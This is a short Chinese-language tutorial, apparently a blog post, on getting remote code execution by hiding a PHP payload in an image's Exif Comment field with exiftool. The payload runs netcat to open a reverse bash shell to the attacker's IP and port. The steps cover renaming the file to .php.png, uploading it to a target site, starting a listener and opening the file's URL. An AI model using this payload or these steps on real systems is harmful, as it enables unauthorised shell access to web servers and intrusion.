通过 Exif 数据远程执行代码
2023-04-18 14:57:04 时间
Exif 代表可交换图像文件格式。Exif 数据在您单击的照片中存储敏感信息,例如地理位置、日期、相机名称、修改日期、时间、传感方法、文件源、压缩类型等。现在,这些数据存在于您使用相机拍摄的每张照片中。
如果服务器没有剥离 EXIF 数据,攻击者可以使用该技术获得远程代码执行。
如何找到这个漏洞?
- 转到您的目标网站并检查 Exif 数据漏洞
- 现在拍摄图像并使用exiftool在其中插入有效载荷
payload:
exiftool -Comment='<?php system(“nc <YourIP> <YourPort> -e /bin/bash”); ?>' 文件名.png
插入有效载荷
3.现在为了执行这个文件,我们需要修改扩展名,因为.png不是可执行格式,所以使用这个命令修改文件扩展名
命令 (linux) :
mv filename.png filename.php.png
修改文件
4. 现在将文件上传到您的目标网站
上传文件
文件上传
5. 在你的机器上启动 Netcat 监听器
6. 现在访问上传文件URL
https://ip/profile/filename.php.png
相关文章
- mac m1,m2 安装 提供GPU支持的pytorch和tensorflow
- Python课堂笔记-库的类型&汇总(12.16)
- Python——for 循环与 continue 语句
- 【Spring】两步轻松实现定时任务
- python中[-1]、[:]、[:-1]、[::-1]、[::-2]、[2::]、[2::-1]用法
- 【面试题】面试官:如果后端给你 1w 条数据,你如何做展示?
- Python+matplotlib数据可视化鼠标悬停自动标注功能实现
- Python 标准库之 shutil 高阶文件操作『详细』
- Python中对字符串类型的多种操作
- python 实现按文件名初始顺序批量重命名
- python语法分析器(parser)源码阅读(一)
- Mac 安装nvm
- python基本数据类型与基本运算
- python 爬虫 短信验证码
- Python入门100例(二)
- Python如何使用input函数获取输入,看完你就会了
- mac环境下安装python3
- 利用Python提前查看的考试成绩!
- python算法设计 - 汉诺塔
- python格式化符号、转义字符、结束符号